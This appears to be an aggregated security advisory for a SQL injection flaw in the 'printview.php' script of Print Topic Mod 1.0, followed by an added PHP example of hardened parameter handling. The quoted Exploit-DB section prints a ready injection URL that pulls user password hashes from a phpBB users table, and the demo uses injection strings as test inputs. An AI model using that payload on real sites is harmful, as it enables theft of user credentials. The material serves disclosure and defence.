Vendor: Print Topic Mod
By: Unknown
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Print Topic Mod
Affected Version From: Print Topic Mod version 1.0
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:print_topic_mod:print_topic_mod:1.0
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Unknown

Remote SQL Injection vulnerability in Print Topic Mod

The 'printview.php' script in Print Topic Mod is vulnerable to remote SQL injection. This vulnerability occurs due to improper sanitization of user-supplied input before using it in an SQL query.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in SQL queries. Additionally, keeping the software up-to-date with the latest security patches is advised.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10757/info

Print Topic Mod is reportedly affected by a remote SQL injection vulnerability in the 'printview.php' script. This issue is due to a failure of the application to properly sanitize user-supplied URI parameter input before using it in an SQL query.

Print Topic Mod version 1.0 is reported to be affected by this issue. 

http://www.example.com/printview.php?t={existing_topic's_id}&order_sql=UNION%20
SELECT%201%20,%20user_password%20,%201,%201,%201,%201,%201,%201,%201,%201,%201,
%201%20FROM%20{phpbb_users_table}%20WHERE%20user_id%20={some_user's_id}%20ORDER
%20BY%20t.topic_id%20ASC
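
The mitigation described above, applied to the two request parameters named in the advisory, as an added example that is not the mod's own code. Because an ORDER BY clause cannot be bound as a query parameter, the request selects a key from a fixed map instead of supplying SQL text, and the topic id is bound as an integer. The function name `build_print_query`, the `order` request key, the `topics` table and the `topic_title` column are hypothetical; the demo assumes the `pdo_sqlite` extension.

```php
<?php
// Added example: hypothetical hardened handling of the request parameters.
// Only the alias/column t.topic_id comes from the advisory; other names are assumed.

// Fixed map of permitted orderings; the SQL text never comes from the client.
const SORT_CLAUSES = [
    'topic_asc'  => 't.topic_id ASC',
    'topic_desc' => 't.topic_id DESC',
];

function build_print_query(array $request): array
{
    // Topic id must be a positive integer; anything else is rejected outright.
    $topicId = filter_var($request['t'] ?? null, FILTER_VALIDATE_INT,
                          ['options' => ['min_range' => 1]]);
    if ($topicId === false) {
        throw new InvalidArgumentException('invalid topic id');
    }
    // Unknown, missing or non-string sort keys fall back to the default ordering.
    $key = $request['order'] ?? '';
    $order = SORT_CLAUSES[is_string($key) ? $key : ''] ?? SORT_CLAUSES['topic_asc'];

    $sql = 'SELECT t.topic_id, t.topic_title FROM topics t '
         . 'WHERE t.topic_id = :tid ORDER BY ' . $order;
    return [$sql, [':tid' => $topicId]];
}

// Constructed in-memory database and constructed request arrays for the demo.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE topics (topic_id INTEGER PRIMARY KEY, topic_title TEXT)');
$db->exec("INSERT INTO topics VALUES (1, 'constructed sample topic')");

$requests = [
    ['t' => '1', 'order' => 'topic_desc'],      // known key
    ['t' => '1', 'order' => 'UNION SELECT 1'],  // not in the map: default order is used
    ['t' => '1 OR 1=1'],                        // not an integer: rejected
];
foreach ($requests as $req) {
    try {
        [$sql, $params] = build_print_query($req);
        $stmt = $db->prepare($sql);
        $stmt->execute($params);
        echo $sql, ' => ', count($stmt->fetchAll()), " row(s)\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
```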